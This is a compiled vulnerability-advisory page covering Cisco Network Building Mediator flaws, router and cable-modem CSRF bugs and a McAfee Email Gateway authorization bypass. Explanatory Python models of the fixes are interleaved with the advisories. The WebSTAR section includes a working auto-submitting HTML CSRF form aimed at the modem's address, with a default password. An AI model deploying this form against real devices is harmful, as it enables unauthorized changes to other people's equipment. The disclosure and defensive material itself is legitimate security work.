Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not properly restrict network access to an unspecified configuration file, which allows remote attackers to read passwords and unspecified other account details via a (1) XML RPC or (2) XML RPC over HTTPS session, aka Bug ID CSCtb83512. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The Cisco Network Building Mediator is a building-automation gateway that interconnects and operates heating, ventilation and cooling (HVAC), lighting, power, security, and renewable energy systems over IP networks. The vulnerabilities are:
- Default credentials (CVE-2010-0595): several predefined user accounts on the device, including the administrator account, ship with default credentials. Any user with network access to the device can log in to the control system as an administrator.
- Privilege escalation (CVE-2010-0596, CVE-2010-0597): an authenticated user without administrator privileges can read and modify the device configuration. CVE-2010-0596 is exploited over the HTTP (or HTTPS) web interface and CVE-2010-0597 over the XML RPC service. Cisco bug ID CSCtb83618 (CVE-2010-0597) can additionally be used to reload the device; repeated exploitation results in a denial of service.
- Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): sessions between the operator workstation and the Cisco Network Building Mediator are not protected against interception. An attacker who can intercept a session obtains the credentials used in it and can use them to control the device. CVE-2010-0598 covers administrator credentials captured from HTTP sessions, CVE-2010-0599 administrator credentials captured from XML RPC sessions.
- Unauthorized information access (CVE-2010-0600): a remote attacker can read a system configuration file that contains user account information, including passwords, and use it to gain administrative access to the affected device.
This issue is tracked by Cisco bug ID CSCtb83512. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 (registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
Privilege escalation
+-------------------
* CSCtb83607 (registered customers only) has been assigned the CVE
identifier CVE-2010-0596. This vulnerability could enable any user to
read and modify device configuration.
* CSCtb83618 (registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this vulnerability can be
exploited to reload the affected device.
Unauthorized information interception
+------------------------------------
A malicious user able to intercept the sessions could learn any
credentials used during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 (registered customers only) has been assigned the CVE
identifier CVE-2010-0598.
* CSCtb83505 (registered customers only) has been assigned the CVE
identifier CVE-2010-0599.
Unauthorized information access
+------------------------------
* CSCtb83512 (registered customers only) has been assigned the CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to the HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is
enabled and running by default and no further action is needed to
enable it. The HTTP service can be disabled with configTOOL. Inside
the Node tree pane, expand the services tab, then expand the network
tab. Click the http_server tab, and then click Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. Exposure can, however,
be reduced by restricting network access to the device to designated
operator consoles with the iptables rules below, which must be
entered on the device console. In the following examples it is
assumed that the operator console has IP address 192.0.2.1; change
192.0.2.1 to match the IP address used by the designated operator
console. Refer to section 2.4 in the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
HyperTerminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example, care must be taken to
also allow the ports and protocols used by sensors and other devices
deployed in the system that are monitored and controlled by the Cisco
Network Building Mediator. With a default DROP policy, any such
traffic not explicitly accepted is silently discarded, which breaks
connectivity to these sensors and devices.
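To check a rule set like the one above before typing it on the serial console, the following Python model (an added example, not Cisco's code and not part of the advisory) reproduces the INPUT chain's first-match evaluation, builds the advisory's rules for a list of consoles, and shows the caveat from the preceding paragraph: with only the console rules in place, a field controller's traffic is dropped until an explicit rule for its protocol is appended. The console addresses follow the advisory; the sensor protocols (BACnet/IP on UDP 47808, Modbus/TCP on TCP 502) and the sample packets are assumptions constructed for illustration.

```python
"""Model of the advisory's iptables INPUT chain.  Added example, not Cisco
code; sensor ports and sample packets are assumptions for illustration."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import List, Optional, Sequence, Tuple


@dataclass(frozen=True)
class Rule:
    """One INPUT-chain rule.  None in a match field means 'match anything'."""
    target: str                    # ACCEPT or DROP
    source: Optional[str] = None   # address or CIDR, e.g. "192.0.2.1"
    proto: Optional[str] = None    # "tcp" or "udp"
    dport: Optional[int] = None    # destination port

    def matches(self, src: str, proto: str, dport: int) -> bool:
        if self.source is not None and ip_address(src) not in ip_network(self.source, strict=False):
            return False
        if self.proto is not None and self.proto != proto:
            return False
        if self.dport is not None and self.dport != dport:
            return False
        return True

    def as_match(self) -> str:
        """The argument text iptables would be given for this rule."""
        parts = []
        if self.source is not None:
            parts.append(f"--source {self.source}")
        if self.proto is not None:
            parts.append(f"-p {self.proto}")
        if self.dport is not None:
            parts.append(f"--dport {self.dport}")
        return " ".join(parts + [f"-j {self.target}"])


@dataclass
class InputChain:
    """Ordered INPUT chain with netfilter's first-match semantics."""
    policy: str = "ACCEPT"                               # kernel default
    rules: List[Rule] = field(default_factory=list)
    commands: List[str] = field(default_factory=list)    # what you would type

    def set_policy(self, policy: str) -> None:
        self.policy = policy
        self.commands.append(f"iptables -P INPUT {policy}")

    def insert(self, position: int, rule: Rule) -> None:
        """iptables -I INPUT <n>: 1-based; rules at n and below shift down."""
        self.rules.insert(position - 1, rule)
        self.commands.append(f"iptables -I INPUT {position} {rule.as_match()}")

    def append(self, rule: Rule) -> None:
        """iptables -A INPUT: goes to the end, after the console rules."""
        self.rules.append(rule)
        self.commands.append(f"iptables -A INPUT {rule.as_match()}")

    def verdict(self, src: str, proto: str, dport: int) -> str:
        for rule in self.rules:        # first matching rule decides
            if rule.matches(src, proto, dport):
                return rule.target
        return self.policy             # nothing matched: default policy


def build_chain(consoles: Sequence[str],
                sensor_services: Sequence[Tuple[str, int]] = ()) -> InputChain:
    """The advisory's rule set, plus explicit exceptions for sensor protocols."""
    chain = InputChain()
    chain.set_policy("DROP")
    for n, console in enumerate(consoles, start=1):
        chain.insert(n, Rule("ACCEPT", source=console))
    for proto, port in sensor_services:
        chain.append(Rule("ACCEPT", proto=proto, dport=port))
    return chain


# Constructed sample data; the sensor ports are assumptions, not NBM facts.
CONSOLES = ["192.0.2.1", "192.0.2.2"]
SENSOR_SERVICES = [("udp", 47808), ("tcp", 502)]   # BACnet/IP, Modbus/TCP
PACKETS = [
    ("192.0.2.1", "tcp", 443),     # operator console reaching HTTPS
    ("192.0.2.50", "udp", 47808),  # field controller speaking BACnet/IP
    ("198.51.100.9", "tcp", 80),   # anyone else trying HTTP
]


def verdicts(chain: InputChain) -> List[str]:
    """Verdict for each sample packet, in PACKETS order."""
    return [chain.verdict(*packet) for packet in PACKETS]


if __name__ == "__main__":
    bare = build_chain(CONSOLES)                   # exactly the advisory's rules
    full = build_chain(CONSOLES, SENSOR_SERVICES)  # with sensor exceptions
    print("advisory rules only:", verdicts(bare))
    print("with sensor rules:  ", verdicts(full))
    print("\n".join(full.commands))
```

Note the insert positions: `-I INPUT 1` followed by `-I INPUT 2` keeps the consoles in the order entered, whereas inserting every rule at position 1 would reverse them (harmless while every rule is ACCEPT, but worth understanding before mixing in DROP rules). iptables rules live in the running kernel only; unless the platform saves and restores them, they are gone after a reload, so re-check the chain after applying any fix that restarts the device.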
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
----------------------------------------------------------------------
VAR-201005-0438 | No CVE | U.S.Robotics USR5463 firmware '/cgi-bin/setup_ddns.exe' cross-site request forgery vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
U.S.Robotics USR5463 is a widely used wireless router. Its web interface does not verify that an administrative request was intentionally issued by the logged-in user, so some management operations can be triggered by plain HTTP requests. An attacker who crafts malicious parameters for the /cgi-bin/setup_ddns.exe script and entices a logged-in user to open the link can change the device configuration and more. U.S.Robotics USR5463 firmware is prone to a cross-site request-forgery vulnerability.
Successful exploits may allow attackers to perform unauthorized actions on the affected device in the context of a logged-in user. This may allow attackers to gain access to or modify sensitive information and perform HTML-injection attacks.
U.S.Robotics USR5463 firmware versions 0.01 through 0.06 are vulnerable.
----------------------------------------------------------------------
TITLE:
USR5463 802.11g Wireless Router Cross-Site Request Forgery
SECUNIA ADVISORY ID:
SA39889
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39889/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39889
RELEASE DATE:
2010-05-25
DESCRIPTION:
David K. has reported a vulnerability in the USR5463 802.11g Wireless
Router, which can be exploited by malicious people to conduct
cross-site request forgery attacks. This can be exploited to e.g. conduct script insertion
attacks via specially crafted parameters passed to the
/cgi-bin/setup_ddns.exe script.
SOLUTION:
Do not browse untrusted websites or follow untrusted links while
logged-in to the device.
PROVIDED AND/OR DISCOVERED BY:
David K.
----------------------------------------------------------------------
VAR-201005-0134 | CVE-2010-2116 | McAfee Email Gateway of Web Vulnerability in which write permission is acquired in the interface |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
The web interface in McAfee Email Gateway (formerly IronMail) 6.7.1 allows remote authenticated users, with only Read privileges, to gain Write privileges to modify configuration via the save action in a direct request to admin/systemWebAdminConfig.do. McAfee Email Gateway (formerly IronMail, also known as Secure Mail) is prone to a remote security-bypass vulnerability.
----------------------------------------------------------------------
TITLE:
McAfee Email Gateway Web Access Security Bypass Vulnerability
SECUNIA ADVISORY ID:
SA39881
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39881/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39881
RELEASE DATE:
2010-05-24
DESCRIPTION:
Nahuel Grisolía has reported a vulnerability in McAfee Email Gateway,
which can be exploited by malicious users to bypass certain security
restrictions.
The vulnerability is caused due to the Web Access interface
performing insufficient checks for requests received from
unprivileged users. This can be exploited by a user without write
privileges to make configuration changes and e.g. add an
administrative user.
The vulnerability is reported in version 6.7.1. Other versions may
also be affected.
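The defect described above is a missing authorization check on a state-changing action, not a broken login: the user is authenticated, the UI hides the Save button from read-only users, and the save action trusts that it was reached through that UI. The following Python model is an added example, not McAfee's code; the action names, privilege names, users and the "add an administrative user" side effect are assumptions chosen to mirror the advisory. It shows a read-only user posting straight to the save action of the unchecked dispatcher, then the same request against a dispatcher that requires a declared privilege for every action and denies unknown ones.

```python
"""Added example (not McAfee code): a privilege check on the page that draws
the form does not protect the action that saves it.  Action names, privilege
names and users are assumptions."""
from dataclasses import dataclass, field
from enum import Flag, auto
from typing import Callable, Dict, List, Tuple


class Priv(Flag):
    READ = auto()
    WRITE = auto()


@dataclass
class User:
    name: str
    privs: Priv


@dataclass
class Request:
    user: User                        # already authenticated
    action: str                       # value of the ?action= parameter
    params: Dict[str, str] = field(default_factory=dict)


@dataclass
class SystemConfig:
    admin_users: List[str] = field(default_factory=lambda: ["admin"])


class WebAdminConfigVulnerable:
    """WRITE is only consulted when drawing the page, to decide whether the
    Save button appears.  A direct request to action=save never sees that
    check and lands on the handler, which assumes the caller was allowed."""

    def __init__(self, cfg: SystemConfig) -> None:
        self.cfg = cfg
        self.last_page = ""
        self.actions: Dict[str, Callable[[Request], int]] = {
            "view": self.view, "save": self.save}

    def handle(self, req: Request) -> int:
        handler = self.actions.get(req.action)
        return 404 if handler is None else handler(req)

    def view(self, req: Request) -> int:
        # Presentation, not authorization: hiding a button stops nothing.
        button = "<button>Save</button>" if Priv.WRITE in req.user.privs else ""
        self.last_page = f"<form>...{button}</form>"
        return 200

    def save(self, req: Request) -> int:
        # No privilege check: authenticated is silently taken as authorized.
        self.cfg.admin_users.append(req.params["new_admin"])
        return 200


class WebAdminConfigFixed(WebAdminConfigVulnerable):
    """Deny by default: every action declares the privilege it needs and the
    dispatcher enforces it before any handler runs, whatever the UI showed."""

    REQUIRED: Dict[str, Priv] = {"view": Priv.READ, "save": Priv.WRITE}

    def handle(self, req: Request) -> int:
        needed = self.REQUIRED.get(req.action)
        if needed is None:
            return 404                  # unknown action: nothing to run
        if needed not in req.user.privs:
            return 403                  # authenticated but not authorized
        return super().handle(req)


# Constructed scenario: a read-only user posts straight to the save action.
READ_ONLY = User("auditor", Priv.READ)
DIRECT_SAVE = Request(READ_ONLY, "save", {"new_admin": "auditor"})


def outcome(app_class) -> Tuple[int, List[str]]:
    """HTTP status for DIRECT_SAVE and the admin list afterwards."""
    cfg = SystemConfig()
    status = app_class(cfg).handle(DIRECT_SAVE)
    return status, list(cfg.admin_users)


if __name__ == "__main__":
    print("vulnerable:", outcome(WebAdminConfigVulnerable))
    print("fixed:     ", outcome(WebAdminConfigFixed))
```

The fix lives in the dispatcher rather than in each handler so that a new action cannot be added without declaring what it requires; an action missing from the table is refused, not allowed. Restricting who can reach the console (the interim measure in the solution below) narrows the pool of attackers but does not change the fact that any of them, with a read-only account, can still perform a write.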
SOLUTION:
Restrict access to the Web Access console to trusted users only.
PROVIDED AND/OR DISCOVERED BY:
Nahuel Grisolía, Cybsec
ORIGINAL ADVISORY:
Cybsec:
http://www.cybsec.com/vuln/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken.pdf
----------------------------------------------------------------------
VAR-201005-0198 | CVE-2010-2025 |
Cisco Scientific Atlanta WebSTAR DPC2100R2 Debug Demodulator Cross-Site Request Forgery Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201005-0342 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allow remote attackers to hijack the authentication of administrators for requests that (1) reset the modem, (2) erase the firmware, (3) change the administrative password, (4) install modified firmware, or (5) change the access level, as demonstrated by a request to goform/_aslvl. The Cisco DPC2100R2 is a cable TV cable modem. Cross-site request forgery: multiple functions provided by the web interface do not correctly establish a session and restrict access to authorized users. Insufficient authentication: the Cisco DPC2100R2 device has access control levels 0-2 (0-3 on some devices); because some operations that require authorization are not properly checked, an attacker can submit a specially constructed POST request to reset the device and install new software without any verification. Other attacks are also possible.
Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. Testing was
performed on a DPC2100R2 modem, with firmware v2.0.2r1256-060303.
1. An attacker may create a
malicious website that, when visited by a victim, updates these settings on the
victim's modem on the victim's behalf without their authorization or need for
any additional user interaction. This issue has been assigned CVE-2010-2025.
2. Insufficient authentication. The modem's access control scheme, which has
levels numbered from 0-2 (or 0-3 on some other models), is not properly checked
before performing operations that should require authentication, including
resetting the modem and installing new firmware. The modem requires the proper
access level to access web interface pages containing forms that allow a user
to perform these actions, but does not properly authenticate the pages that
actually carry out these actions. By sending a POST request directly to these
pages, these actions may be performed without any authentication. Attacks may
be performed by an attacker on the local network or by leveraging the CSRF
vulnerability. This issue has been assigned CVE-2010-2026.
==Identifying Vulnerable Installations==
Most home installations of this modem will feature a web interface that is
accessible at "http://192.168.100.1". The following proof-of-concept code may
be used to test for vulnerability. It leverages the CSRF vulnerability to
change the access level of your modem to the most restrictive settings (a
harmless action). If your modem is vulnerable, then you will be presented with
a message stating that your settings have been successfully updated. If you
are greeted with a page stating there was a "Password confirmation error", then
your modem password has been changed from the default but you are still
vulnerable. If you are greeted with an HTTP authentication form or other
message, then your model is not vulnerable.
<html>
<head>
<title>Test for CSRF vulnerability in WebSTAR modems</title>
</head>
<body>
<form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl">
<input type="hidden" name="SAAccessLevel" value="0">
<input type="hidden" name="SAPassword" value="W2402">
</form>
<script>document.csrf.submit()</script>
</body>
</html>
==Solution==
In most cases, home users will be unable to update vulnerable firmware without
assistance from their cable providers. For
the DPC2100R2 modems, the latest version string is
dpc2100R2-v202r1256-100324as.
To prevent exploitation of CSRF vulnerabilities, users are always encouraged
to practice safe browsing habits and avoid visiting unknown or untrusted
websites.
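The two defects the advisory describes (the page that shows the form is gated on access level while the endpoint that performs the action is not, and a forged cross-site form submission rides on the victim's browser) are shown side by side below as an added defensive example. This is not Cisco's, Scientific Atlanta's or the advisory author's code: the in-memory `Modem` dispatcher, the `Request` and `Session` types, `ADMIN_LEVEL` and the `csrf_token` field are assumptions made for the illustration; only the endpoint `/goform/_aslvl` and the `SAAccessLevel`/`SAPassword` fields come from the advisory text above.

```python
# Added illustration (not vendor code): authorising the action endpoint itself
# and binding state-changing POSTs to a per-session anti-CSRF token.
import hmac
import secrets
from dataclasses import dataclass, field

ADMIN_LEVEL = 2  # assumed: top of the 0-2 access-level scheme described above


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)  # attached by the browser
    form: dict = field(default_factory=dict)     # chosen by whoever built the form


@dataclass
class Session:
    access_level: int
    # per-session secret; a page on another origin cannot read it
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


class Modem:
    def __init__(self):
        self.sessions = {}
        self.access_level = ADMIN_LEVEL
        self.audit = []

    def login(self, level):
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session(level)
        return sid

    def _session(self, req):
        return self.sessions.get(req.cookies.get("sid", ""))

    def _apply_level(self, req):
        self.access_level = int(req.form["SAAccessLevel"])
        self.audit.append("SAAccessLevel=%d" % self.access_level)
        return 200, "settings updated"

    # Vulnerable pattern from the advisory: only the page that *shows* the form
    # checks the access level; the endpoint that *applies* the change does not.
    def handle_vulnerable(self, req):
        if req.path == "/form":
            s = self._session(req)
            if s is None or s.access_level < ADMIN_LEVEL:
                return 401, "access level required"
            return 200, '<form action="/goform/_aslvl">...</form>'
        if req.method == "POST" and req.path == "/goform/_aslvl":
            return self._apply_level(req)  # no session check, no origin check
        return 404, "not found"

    # Hardened pattern: every request is authorised, and a state-changing POST
    # must also carry the session's token. The cookie alone is ambient
    # authority that a forged cross-site submission inherits; the token is not.
    def handle_hardened(self, req):
        s = self._session(req)
        if s is None or s.access_level < ADMIN_LEVEL:
            return 401, "access level required"
        if req.path == "/form":
            return 200, ('<form action="/goform/_aslvl"><input type="hidden" '
                         'name="csrf_token" value="%s">...</form>' % s.csrf_token)
        if req.method == "POST" and req.path == "/goform/_aslvl":
            if not hmac.compare_digest(req.form.get("csrf_token", ""), s.csrf_token):
                return 403, "csrf token missing or wrong"
            return self._apply_level(req)
        return 404, "not found"


def forged_post(sid=None):
    """Constructed request shaped like the advisory's PoC form: the attacking
    page picks the fields (a guessable SAPassword is no CSRF defence) and the
    browser adds the victim's cookie, but the page cannot supply the token."""
    cookies = {"sid": sid} if sid else {}
    return Request("POST", "/goform/_aslvl", cookies,
                   {"SAAccessLevel": "0", "SAPassword": "W2402"})


def demo():
    """(vulnerable status, hardened status anonymous, hardened status with
    victim cookie but no token, vulnerable level after, hardened level after)."""
    v = Modem()
    vuln_status = v.handle_vulnerable(forged_post())[0]
    h = Modem()
    anon_status = h.handle_hardened(forged_post())[0]
    sid = h.login(ADMIN_LEVEL)               # victim is logged in as admin
    csrf_status = h.handle_hardened(forged_post(sid))[0]
    return vuln_status, anon_status, csrf_status, v.access_level, h.access_level


if __name__ == "__main__":
    print(demo())  # (200, 401, 403, 0, 2)
```

Running the block shows the forged request succeeding against the vulnerable dispatcher (the level drops to 0) and being rejected twice by the hardened one: with no session it fails authorisation, and with the victim's cookie it fails the token check. A genuine submission from the rendered form, which carries the token, still goes through. Origin/Referer validation and the SameSite cookie attribute are further layers on modern stacks, but authorising the action endpoint itself plus a per-session token are what closes the two issues the advisory names.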
==Credits==
These vulnerabilities were discovered by Dan Rosenberg
(dan.j.rosenberg@gmail.com).
Thanks to Matthew Bergin for suggesting I should look at cable modems.
==Timeline==
1/26/10 - Vulnerability reported to Cisco
1/26/10 - Response, issue assigned internal tracking number
2/26/10 - Status update requested
2/26/10 - Response
5/15/10 - Status update requested
5/17/10 - Response, confirmation that newest firmware resolves issues
5/17/10 - Disclosure date set
5/24/10 - Disclosure
==References==
CVE identifiers CVE-2010-2025 and CVE-2010-2026 have been assigned to these
issues